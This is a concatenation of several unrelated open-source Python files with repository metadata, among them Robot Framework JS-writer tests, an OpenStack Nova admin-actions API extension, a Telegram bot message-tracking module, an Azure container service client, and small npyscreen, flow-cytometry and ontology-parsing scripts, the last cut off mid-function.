def get_lines(suite=(), strings=(), basemillis=100, start_block='',
end_block='', split_threshold=9999, min_level='INFO'):
output = StringIO()
data = JsExecutionResult(suite, None, None, strings, basemillis, min_level=min_level)
writer = JsResultWriter(output, start_block, end_block, split_threshold)
writer.write(data, settings={})
return output.getvalue().splitlines()
def assert_separators(lines, separator, end_separator=False):
for index, line in enumerate(lines):
if index % 2 == int(end_separator):
assert_equal(line, separator)
else:
assert_true(line.startswith('window.'), line)
class TestDataModelWrite(unittest.TestCase):
def test_writing_datamodel_elements(self):
lines = get_lines(min_level='DEBUG')
assert_true(lines[0].startswith('window.output = {}'), lines[0])
assert_true(lines[1].startswith('window.output["'), lines[1])
assert_true(lines[-1].startswith('window.settings ='), lines[-1])
def test_writing_datamodel_with_separator(self):
lines = get_lines(start_block='seppo\n')
assert_true(len(lines) >= 2)
assert_separators(lines, 'seppo')
def test_splitting_output_strings(self):
lines = get_lines(strings=['data' for _ in range(100)],
split_threshold=9, end_block='?\n')
parts = [l for l in lines if l.startswith('window.output["strings')]
assert_equal(len(parts), 13)
assert_equal(parts[0], 'window.output["strings"] = [];')
for line in parts[1:]:
assert_true(line.startswith('window.output["strings"] = window.output["strings"].concat(['), line)
assert_separators(lines, '?', end_separator=True)
class TestSuiteWriter(unittest.TestCase):
def test_no_splitting(self):
suite = (1, (2, 3), (4, (5,), (6, ())), 8)
expected = ['window.output["suite"] = [1,[2,3],[4,[5],[6,[]]],8];']
self._assert_splitting(suite, 100, expected)
def test_simple_splitting_version_1(self):
suite = ((1, 2, 3, 4), (5, 6, 7, 8), 9)
expected = ['window.sPart0 = [1,2,3,4];',
'window.sPart1 = [5,6,7,8];',
'window.output["suite"] = [window.sPart0,window.sPart1,9];']
self._assert_splitting(suite, 4, expected)
def test_simple_splitting_version_2(self):
suite = ((1, 2, 3, 4), (5, 6, 7, 8), 9, 10)
expected = ['window.sPart0 = [1,2,3,4];',
'window.sPart1 = [5,6,7,8];',
'window.sPart2 = [window.sPart0,window.sPart1,9,10];',
'window.output["suite"] = window.sPart2;']
self._assert_splitting(suite, 4, expected)
def test_simple_splitting_version_3(self):
suite = ((1, 2, 3, 4), (5, 6, 7, 8, 9, 10), 11)
expected = ['window.sPart0 = [1,2,3,4];',
'window.sPart1 = [5,6,7,8,9,10];',
'window.output["suite"] = [window.sPart0,window.sPart1,11];']
self._assert_splitting(suite, 4, expected)
def test_tuple_itself_has_size_one(self):
suite = ((1, (), (), 4), (((((),),),),))
expected = ['window.sPart0 = [1,[],[],4];',
'window.sPart1 = [[[[[]]]]];',
'window.output["suite"] = [window.sPart0,window.sPart1];']
self._assert_splitting(suite, 4, expected)
def test_nested_splitting(self):
suite = (1, (2, 3), (4, (5,), (6, 7)), 8)
expected = ['window.sPart0 = [2,3];',
'window.sPart1 = [6,7];',
'window.sPart2 = [4,[5],window.sPart1];',
'window.sPart3 = [1,window.sPart0,window.sPart2,8];',
'window.output["suite"] = window.sPart3;']
self._assert_splitting(suite, 2, expected)
def _assert_splitting(self, suite, threshold, expected):
lines = get_lines(suite, split_threshold=threshold, start_block='foo\n')
parts = [l for l in lines if l.startswith(('window.sPart',
'window.output["suite"]'))]
assert_equal(parts, expected)
assert_separators(lines, 'foo')
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "fdcbb23b014584dbda5439be299f2bfd",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 110,
"avg_line_length": 43.10576923076923,
"alnum_prop": 0.5670310060227526,
"repo_name": "jaloren/robotframework",
"id": "dc0a0393d22c6aec52ed68a5d1db35d2de178959",
"size": "4483",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "utest/reporting/test_jswriter.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "245"
},
{
"name": "CSS",
"bytes": "23490"
},
{
"name": "HTML",
"bytes": "140926"
},
{
"name": "Java",
"bytes": "58264"
},
{
"name": "JavaScript",
"bytes": "160797"
},
{
"name": "Python",
"bytes": "2241544"
},
{
"name": "RobotFramework",
"bytes": "2074646"
},
{
"name": "Shell",
"bytes": "281"
}
],
"symlink_target": ""
} |
import traceback
from oslo_log import log as logging
from oslo_utils import strutils
import six
import webob
from webob import exc
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova.compute import vm_states
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova import utils
LOG = logging.getLogger(__name__)
# States usable in resetState action
state_map = dict(active=vm_states.ACTIVE, error=vm_states.ERROR)
def authorize(context, action_name):
action = 'admin_actions:%s' % action_name
extensions.extension_authorizer('compute', action)(context)
class AdminActionsController(wsgi.Controller):
def __init__(self, *args, **kwargs):
super(AdminActionsController, self).__init__(*args, **kwargs)
self.compute_api = compute.API()
@wsgi.action('pause')
def _pause(self, req, id, body):
"""Permit Admins to pause the server."""
ctxt = req.environ['nova.context']
authorize(ctxt, 'pause')
server = common.get_instance(self.compute_api, ctxt, id)
try:
self.compute_api.pause(ctxt, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'pause', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::pause %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('unpause')
def _unpause(self, req, id, body):
"""Permit Admins to unpause the server."""
ctxt = req.environ['nova.context']
authorize(ctxt, 'unpause')
server = common.get_instance(self.compute_api, ctxt, id)
try:
self.compute_api.unpause(ctxt, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'unpause', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::unpause %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('suspend')
def _suspend(self, req, id, body):
"""Permit admins to suspend the server."""
context = req.environ['nova.context']
authorize(context, 'suspend')
server = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.suspend(context, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'suspend', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("compute.api::suspend %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('resume')
def _resume(self, req, id, body):
"""Permit admins to resume the server from suspend."""
context = req.environ['nova.context']
authorize(context, 'resume')
server = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.resume(context, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'resume', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("compute.api::resume %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('migrate')
def _migrate(self, req, id, body):
"""Permit admins to migrate a server to a new host."""
context = req.environ['nova.context']
authorize(context, 'migrate')
instance = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.resize(req.environ['nova.context'], instance)
except exception.QuotaError as error:
raise exc.HTTPForbidden(explanation=error.format_message())
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'migrate', id)
except exception.InstanceNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.NoValidHost as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
except Exception:
LOG.exception(_LE("Error in migrate"))
raise exc.HTTPBadRequest()
return webob.Response(status_int=202)
@wsgi.action('resetNetwork')
def _reset_network(self, req, id, body):
"""Permit admins to reset networking on a server."""
context = req.environ['nova.context']
authorize(context, 'resetNetwork')
instance = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.reset_network(context, instance)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::reset_network %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('injectNetworkInfo')
def _inject_network_info(self, req, id, body):
"""Permit admins to inject network info into a server."""
context = req.environ['nova.context']
authorize(context, 'injectNetworkInfo')
instance = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.inject_network_info(context, instance)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::inject_network_info %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('lock')
def _lock(self, req, id, body):
"""Lock a server instance."""
context = req.environ['nova.context']
authorize(context, 'lock')
instance = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.lock(context, instance)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::lock %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('unlock')
def _unlock(self, req, id, body):
"""Unlock a server instance."""
context = req.environ['nova.context']
authorize(context, 'unlock')
instance = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.unlock(context, instance)
except exception.PolicyNotAuthorized as e:
raise webob.exc.HTTPForbidden(explanation=e.format_message())
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::unlock %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('createBackup')
def _create_backup(self, req, id, body):
"""Backup a server instance.
Images now have an `image_type` associated with them, which can be
'snapshot' or the backup type, like 'daily' or 'weekly'.
If the image_type is backup-like, then the rotation factor can be
included and that will cause the oldest backups that exceed the
rotation factor to be deleted.
"""
context = req.environ["nova.context"]
authorize(context, 'createBackup')
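        # Example request body (illustrative only; the values are made up):
        #   {"createBackup": {"name": "weekly-backup",
        #                     "backup_type": "weekly",
        #                     "rotation": 4,
        #                     "metadata": {"purpose": "scheduled"}}}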
entity = body["createBackup"]
try:
image_name = entity["name"]
backup_type = entity["backup_type"]
rotation = entity["rotation"]
except KeyError as missing_key:
msg = _("createBackup entity requires %s attribute") % missing_key
raise exc.HTTPBadRequest(explanation=msg)
except TypeError:
msg = _("Malformed createBackup entity")
raise exc.HTTPBadRequest(explanation=msg)
try:
rotation = utils.validate_integer(rotation, "rotation",
min_value=0)
except exception.InvalidInput as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
props = {}
metadata = entity.get('metadata', {})
common.check_img_metadata_properties_quota(context, metadata)
try:
props.update(metadata)
except ValueError:
msg = _("Invalid metadata")
raise exc.HTTPBadRequest(explanation=msg)
instance = common.get_instance(self.compute_api, context, id)
try:
image = self.compute_api.backup(context, instance, image_name,
backup_type, rotation, extra_properties=props)
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'createBackup', id)
except exception.InvalidRequest as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
resp = webob.Response(status_int=202)
# build location of newly-created image entity if rotation is not zero
if rotation > 0:
image_id = str(image['id'])
image_ref = common.url_join(req.application_url, 'images',
image_id)
resp.headers['Location'] = image_ref
return resp
@wsgi.action('os-migrateLive')
def _migrate_live(self, req, id, body):
"""Permit admins to (live) migrate a server to a new host."""
context = req.environ["nova.context"]
authorize(context, 'migrateLive')
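        # Example request body (illustrative only; the host name is made up):
        #   {"os-migrateLive": {"host": "compute-02",
        #                       "block_migration": false,
        #                       "disk_over_commit": false}}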
try:
block_migration = body["os-migrateLive"]["block_migration"]
disk_over_commit = body["os-migrateLive"]["disk_over_commit"]
host = body["os-migrateLive"]["host"]
except (TypeError, KeyError):
msg = _("host, block_migration and disk_over_commit must "
"be specified for live migration.")
raise exc.HTTPBadRequest(explanation=msg)
try:
block_migration = strutils.bool_from_string(block_migration,
strict=True)
disk_over_commit = strutils.bool_from_string(disk_over_commit,
strict=True)
except ValueError as err:
raise exc.HTTPBadRequest(explanation=six.text_type(err))
instance = common.get_instance(self.compute_api, context, id)
try:
self.compute_api.live_migrate(context, instance, block_migration,
disk_over_commit, host)
except (exception.NoValidHost,
exception.ComputeServiceUnavailable,
exception.InvalidHypervisorType,
exception.InvalidCPUInfo,
exception.UnableToMigrateToSelf,
exception.DestinationHypervisorTooOld,
exception.InvalidLocalStorage,
exception.InvalidSharedStorage,
exception.HypervisorUnavailable,
exception.MigrationPreCheckError) as ex:
raise exc.HTTPBadRequest(explanation=ex.format_message())
except exception.InstanceNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'os-migrateLive', id)
except Exception:
if host is None:
msg = _("Live migration of instance %s to another host "
"failed") % id
else:
msg = _("Live migration of instance %(id)s to host %(host)s "
"failed") % {'id': id, 'host': host}
LOG.exception(msg)
# Return messages from scheduler
raise exc.HTTPInternalServerError(explanation=msg)
return webob.Response(status_int=202)
@wsgi.action('os-resetState')
def _reset_state(self, req, id, body):
"""Permit admins to reset the state of a server."""
context = req.environ["nova.context"]
authorize(context, 'resetState')
# Identify the desired state from the body
try:
state = state_map[body["os-resetState"]["state"]]
except (TypeError, KeyError):
msg = _("Desired state must be specified. Valid states "
"are: %s") % ', '.join(sorted(state_map.keys()))
raise exc.HTTPBadRequest(explanation=msg)
instance = common.get_instance(self.compute_api, context, id)
try:
instance.vm_state = state
instance.task_state = None
instance.save(admin_state_reset=True)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::resetState %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
class Admin_actions(extensions.ExtensionDescriptor):
"""Enable admin-only server actions
Actions include: pause, unpause, suspend, resume, migrate,
resetNetwork, injectNetworkInfo, lock, unlock, createBackup
"""
name = "AdminActions"
alias = "os-admin-actions"
namespace = "http://docs.openstack.org/compute/ext/admin-actions/api/v1.1"
updated = "2011-09-20T00:00:00Z"
def get_controller_extensions(self):
controller = AdminActionsController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
| {
"content_hash": "ba4b0a370b413d000f68d47fb621f91b",
"timestamp": "",
"source": "github",
"line_count": 388,
"max_line_length": 79,
"avg_line_length": 42.121134020618555,
"alnum_prop": 0.6171449550266169,
"repo_name": "cernops/nova",
"id": "ebd3c43e80e13015e910a4c330089cdfab98deff",
"size": "16948",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "nova/api/openstack/compute/legacy_v2/contrib/admin_actions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "983"
},
{
"name": "JavaScript",
"bytes": "2639"
},
{
"name": "Python",
"bytes": "17413087"
},
{
"name": "Shell",
"bytes": "36658"
},
{
"name": "Smarty",
"bytes": "295563"
}
],
"symlink_target": ""
} |
import datetime
from pony.orm import *
from pony import orm
from typing import Optional, Dict, Union
from ..core import HorseFaxBot, ModuleTools, BaseModule
from ..db import db
from horsefax.telegram.types import (Message, User, Chat, UsersJoinedMessage, UserLeftMessage, ChatMigrateFromIDMessage,
MessagePinnedMessage, TextMessage, TextEntity, PhotoMessage, StickerMessage,
VideoMessage, VideoNoteMessage, DocumentMessage, AudioMessage, PhotoSize)
class TelegramUser(db.Entity):
id = PrimaryKey(int)
username = orm.Optional(str, index=True, nullable=True)
first_name = Required(str)
last_name = orm.Optional(str, nullable=True)
language_code = orm.Optional(str, nullable=True)
chats = Set('TelegramChat')
sent_messages = Set('TelegramMessage', reverse="sender")
forwarded_messages = Set('TelegramMessage', reverse="forward_from")
# for groups module
ping_groups = Set('PingGroup')
def to_user(self):
return User({'id': self.id,
'username': self.username,
'first_name': self.first_name,
'last_name': self.last_name,
'language_code': self.language_code})
class TelegramChat(db.Entity):
id = PrimaryKey(int, size=64)
type = Required(Chat.Type, index=True)
title = orm.Optional(str, nullable=True)
all_members_are_administrators = Required(bool)
users = Set(TelegramUser)
pinned_message = orm.Optional(int)
messages = Set('TelegramMessage', reverse="chat")
class TelegramMessage(db.Entity):
id = Required(int)
chat = Required(TelegramChat)
sender = Required(TelegramUser, reverse="sent_messages")
date = Required(datetime.datetime, index=True)
forward_from = orm.Optional(TelegramUser, reverse="forwarded_messages")
reply_to = orm.Optional('TelegramMessage')
replies = Set('TelegramMessage')
edit_date = orm.Optional(datetime.datetime)
PrimaryKey(chat, id)
class TelegramTextMessage(TelegramMessage):
text = Required(str)
entities = Required(Json)
class FileMessage(TelegramMessage):
file_id = Required(str)
mime_type = orm.Optional(str, nullable=True)
file_size = orm.Optional(int)
caption = orm.Optional(str, nullable=True)
thumbnail = orm.Optional(str, nullable=True)
class VisualMessage(FileMessage):
width = Required(int)
height = Required(int)
class LongMessage(FileMessage):
duration = Required(int)
class TelegramPhotoMessage(VisualMessage):
pass
class TelegramStickerMessage(VisualMessage):
emoji = orm.Optional(str, nullable=True)
class TelegramVideoMessage(LongMessage, VisualMessage):
pass
class TelegramVideoNoteMessage(LongMessage, VisualMessage):
pass
class TelegramDocumentMessage(FileMessage):
file_name = orm.Optional(str, nullable=True)
class TelegramAudioMessage(LongMessage):
performer = orm.Optional(str, nullable=True)
title = orm.Optional(str, nullable=True)
class TrackingModule(BaseModule):
def __init__(self, bot: HorseFaxBot, util: ModuleTools) -> None:
self.bot = bot
self.util = util
self.bot.telegram.register_handler("message", self.handle_message)
@db_session
def handle_message(self, message: Message) -> None:
# Track members
origin = message.sender
self.update_user(origin)
if message.forward_from and isinstance(message.forward_from, User):
self.update_user(message.forward_from)
if message.reply_to_message:
self.handle_message(message.reply_to_message)
if isinstance(message, TextMessage):
for entity in message.entities:
if entity.user is not None:
self.update_user(entity.user)
# Track chats
self.update_chat(message.chat)
TelegramChat[message.chat.id].users.add(TelegramUser[origin.id])
if isinstance(message, UsersJoinedMessage):
for user in message.users:
self.update_user(user)
TelegramChat[message.chat.id].users.add(TelegramUser[user.id])
if isinstance(message, UserLeftMessage):
self.update_user(message.user)
TelegramChat[message.chat.id].users.remove(TelegramUser[message.user.id])
if isinstance(message, MessagePinnedMessage):
TelegramChat[message.chat.id].pinned_message = message.message.message_id
if isinstance(message, ChatMigrateFromIDMessage):
TelegramChat[message.chat.id].users.add(TelegramChat[message.id].users)
TelegramChat[message.id].users.clear()
if TelegramMessage.get(id=message.message_id):
return
# Handle logging
log_params = {'id': message.message_id,
'sender': TelegramUser[message.sender.id],
'date': message.date,
'chat': TelegramChat[message.chat.id],
'forward_from': TelegramUser[message.forward_from.id] if message.forward_from else None,
'reply_to': TelegramMessage.get(id=message.reply_to_message.message_id) if message.reply_to_message is not None else None,
'edit_date': message.edit_date}
if isinstance(message, TextMessage):
TelegramTextMessage(text=message.text,
entities=[self._json_from_entity(x) for x in message.entities],
**log_params)
elif isinstance(message, PhotoMessage):
big_photo = max(message.photo, key=lambda x: x.width * x.height) # type: PhotoSize
if len(message.photo) > 1:
small_photo = min(message.photo, key=lambda x: x.width * x.height) # type: PhotoSize
thumb = small_photo.file_id
else:
thumb = None
TelegramPhotoMessage(file_id=big_photo.file_id, file_size=big_photo.file_size, width=big_photo.width,
height=big_photo.height, caption=message.caption, mime_type="image/jpeg",
thumbnail=thumb, **log_params)
elif isinstance(message, StickerMessage):
TelegramStickerMessage(file_id=message.file_id, file_size=message.file_size, mime_type="image/webp",
width=message.width, height=message.height, emoji=message.emoji, **log_params)
elif isinstance(message, VideoMessage):
TelegramVideoMessage(file_id=message.file_id, file_size=message.file_size, mime_type=message.mime_type,
width=message.width, height=message.height, duration=message.duration,
thumbnail=message.thumbnail.file_id if message.thumbnail else None,
caption=message.caption, **log_params)
elif isinstance(message, VideoNoteMessage):
TelegramVideoNoteMessage(file_id=message.file_id, file_size=message.file_size, mime_type="video/mp4",
width=message.length, height=message.length,
thumbnail=message.thumbnail.file_id if message.thumbnail else None,
duration=message.duration, **log_params)
elif isinstance(message, DocumentMessage):
TelegramDocumentMessage(file_id=message.file_id, file_size=message.file_size, mime_type=message.mime_type,
thumbnail=message.thumbnail.file_id if message.thumbnail else None,
caption=message.caption, file_name=message.file_name, **log_params)
elif isinstance(message, AudioMessage):
TelegramAudioMessage(file_id=message.file_id, file_size=message.file_size, mime_type=message.mime_type,
performer=message.performer, title=message.title, **log_params)
def update_chat(self, chat: Chat):
try:
TelegramChat[chat.id].set(title=chat.title, type=chat.type,
all_members_are_administrators=chat.all_members_are_administrators)
except ObjectNotFound:
TelegramChat(id=chat.id, type=chat.type, title=chat.title,
all_members_are_administrators=chat.all_members_are_administrators)
@db_session
def update_user(self, user: User):
try:
TelegramUser[user.id].set(username=user.username, first_name=user.first_name,
last_name=user.last_name, language_code=user.language_code)
except ObjectNotFound:
TelegramUser(id=user.id, username=user.username,
first_name=user.first_name, last_name=user.last_name,
language_code=user.language_code)
@db_session
def user_by_username(self, username: str) -> Optional[User]:
user = TelegramUser.get(username=username)
if user is None:
return None
return user.to_user()
def _json_from_entity(self, entity: TextEntity) -> Dict[str, Union[str, int]]:
ret = {
'type': entity.type.value,
'offset': entity.offset,
'length': entity.length,
}
if entity.url:
ret['url'] = entity.url
if entity.user:
ret['user'] = entity.user.id
return ret
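    # Illustrative note (an addition, not part of the original module): for a
    # Telegram "bold" entity covering the first four characters of a message,
    # the dict built above would be {'type': 'bold', 'offset': 0, 'length': 4};
    # the optional 'url' and 'user' keys only appear when the entity carries
    # them (e.g. text links and user mentions).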
| {
"content_hash": "40c1b6a28f5a8030da16845632d9741e",
"timestamp": "",
"source": "github",
"line_count": 223,
"max_line_length": 144,
"avg_line_length": 42.65022421524664,
"alnum_prop": 0.6260119861213332,
"repo_name": "TallonRain/horsefaxbot",
"id": "ced7ea31abd543710e88900f7dac0c85145ab1c2",
"size": "9511",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "horsefax/bot/modules/tracking.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "54475"
}
],
"symlink_target": ""
} |
from msrest.service_client import ServiceClient
from msrest import Serializer, Deserializer
from msrestazure import AzureConfiguration
from .version import VERSION
from .operations.container_services_operations import ContainerServicesOperations
from .operations.managed_clusters_operations import ManagedClustersOperations
from . import models
class ContainerServiceClientConfiguration(AzureConfiguration):
"""Configuration for ContainerServiceClient
Note that all parameters used to create this instance are saved as instance
attributes.
:param credentials: Credentials needed for the client to connect to Azure.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param subscription_id: Subscription credentials which uniquely identify
Microsoft Azure subscription. The subscription ID forms part of the URI
for every service call.
:type subscription_id: str
:param str base_url: Service URL
"""
def __init__(
self, credentials, subscription_id, base_url=None):
if credentials is None:
raise ValueError("Parameter 'credentials' must not be None.")
if subscription_id is None:
raise ValueError("Parameter 'subscription_id' must not be None.")
if not base_url:
base_url = 'https://management.azure.com'
super(ContainerServiceClientConfiguration, self).__init__(base_url)
self.add_user_agent('azure-mgmt-containerservice/{}'.format(VERSION))
self.add_user_agent('Azure-SDK-For-Python')
self.credentials = credentials
self.subscription_id = subscription_id
class ContainerServiceClient(object):
"""The Container Service Client.
:ivar config: Configuration for client.
:vartype config: ContainerServiceClientConfiguration
:ivar container_services: ContainerServices operations
:vartype container_services: azure.mgmt.containerservice.operations.ContainerServicesOperations
:ivar managed_clusters: ManagedClusters operations
:vartype managed_clusters: azure.mgmt.containerservice.operations.ManagedClustersOperations
:param credentials: Credentials needed for the client to connect to Azure.
:type credentials: :mod:`A msrestazure Credentials
object<msrestazure.azure_active_directory>`
:param subscription_id: Subscription credentials which uniquely identify
Microsoft Azure subscription. The subscription ID forms part of the URI
for every service call.
:type subscription_id: str
:param str base_url: Service URL
"""
def __init__(
self, credentials, subscription_id, base_url=None):
self.config = ContainerServiceClientConfiguration(credentials, subscription_id, base_url)
self._client = ServiceClient(self.config.credentials, self.config)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.container_services = ContainerServicesOperations(
self._client, self.config, self._serialize, self._deserialize)
self.managed_clusters = ManagedClustersOperations(
self._client, self.config, self._serialize, self._deserialize)
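# Minimal usage sketch (an addition, not part of the generated SDK module): the
# credential object and the list() call below are assumptions based on common
# Azure SDK patterns, shown only to illustrate how the client defined above is
# wired together.
def _example_list_managed_clusters(credentials, subscription_id):
    client = ContainerServiceClient(credentials, subscription_id)
    for cluster in client.managed_clusters.list():
        print(cluster.name)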
| {
"content_hash": "2daae1c14a5b1afad338dcf7c1135194",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 99,
"avg_line_length": 42.782051282051285,
"alnum_prop": 0.7329937069223854,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "a1c73e58daf58606fed329d20761f6a5f5bf402b",
"size": "3811",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "azure-mgmt-containerservice/azure/mgmt/containerservice/container_service_client.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
} |
import npyscreen
class TestApp(npyscreen.NPSApp):
def main(self):
# These lines create the form and populate it with widgets.
# A fairly complex screen in only 8 or so lines of code - a line for each control.
npyscreen.setTheme(npyscreen.Themes.ColorfulTheme)
F = npyscreen.SplitForm(name = "Welcome to Npyscreen",)
t = F.add(npyscreen.Textfield, name = "Text:", )
t1 = F.add(npyscreen.TitleText, name = "Text:", )
t2 = F.add(npyscreen.TitleMultiSelect, name="Testing", values=range(200))
# This lets the user play with the Form.
F.edit()
if __name__ == "__main__":
App = TestApp()
App.run()
| {
"content_hash": "2b186a29496cb29d1407fe7b72ee50a6",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 90,
"avg_line_length": 39.88235294117647,
"alnum_prop": 0.6297935103244838,
"repo_name": "t1g0r/npyscreen",
"id": "c0ea2aef1804a4688d18ba3142e6321eee40f93c",
"size": "700",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "TESTING-RESIZE.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "17"
},
{
"name": "HTML",
"bytes": "26473"
},
{
"name": "Makefile",
"bytes": "4634"
},
{
"name": "Perl",
"bytes": "14592"
},
{
"name": "PowerShell",
"bytes": "8252"
},
{
"name": "Python",
"bytes": "1252129"
},
{
"name": "Shell",
"bytes": "12930"
}
],
"symlink_target": ""
} |
"""
Demonstrates how to implement a custom transformation of the data.
"""
import os
import FlowCytometryTools
from FlowCytometryTools import FCMeasurement
from pylab import *
# Locate sample data included with this package
datadir = os.path.join(FlowCytometryTools.__path__[0], 'tests', 'data', 'Plate01')
datafile = os.path.join(datadir, 'RFP_Well_A3.fcs')
# datafile = '[insert path to your own fcs file]'
def transform_using_this_method(original_sample):
""" This function implements a log transformation on the data. """
# Copy the original sample
new_sample = original_sample.copy()
new_data = new_sample.data
# Our transformation goes here
new_data['Y2-A'] = log(new_data['Y2-A'])
new_data = new_data.dropna() # Removes all NaN entries
new_sample.data = new_data
return new_sample
# Load data
sample = FCMeasurement(ID='Test Sample', datafile=datafile)
# Transform using our own custom method
custom_transform_sample = sample.apply(transform_using_this_method)
###
# To do this with a collection (a plate):
# compensated_plate = plate.apply(transform_using_this_method,
# output_format='collection')
# Plot
custom_transform_sample.plot(['Y2-A'], color='green', alpha=0.9);
grid(True)
title('Custom log transformation')
# show() # <-- Uncomment when running as a script.
| {
"content_hash": "ee3a7e00111b33d0a4050348aa249eca",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 82,
"avg_line_length": 28.638297872340427,
"alnum_prop": 0.7080237741456167,
"repo_name": "eyurtsev/FlowCytometryTools",
"id": "566d87a14ba1a5038098fbb2f4da353f2089c89b",
"size": "1346",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "doc/source/pyplots/arbitrary_manipulation/transformation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "7195"
},
{
"name": "Jupyter Notebook",
"bytes": "330726"
},
{
"name": "Python",
"bytes": "204129"
}
],
"symlink_target": ""
} |
import os
import re
import csv
import obonet
import pickle
from collections import Counter
def get_synonyms(syns_entry):
synonyms = []
for synonym in syns_entry:
match = re.match(r'^\"(.+)\" (EXACT|RELATED|NARROW|BROAD)',
synonym)
syn, status = match.groups()
if status in allowed_synonyms:
synonyms.append(syn)
return synonyms
def length_filter(txt):
# We filter out single-character names and names that are very long
# and so are unlikely to be ever found in text
return 2 <= len(txt) <= 50
def character_filter(txt):
cnt = Counter([c for c in txt])
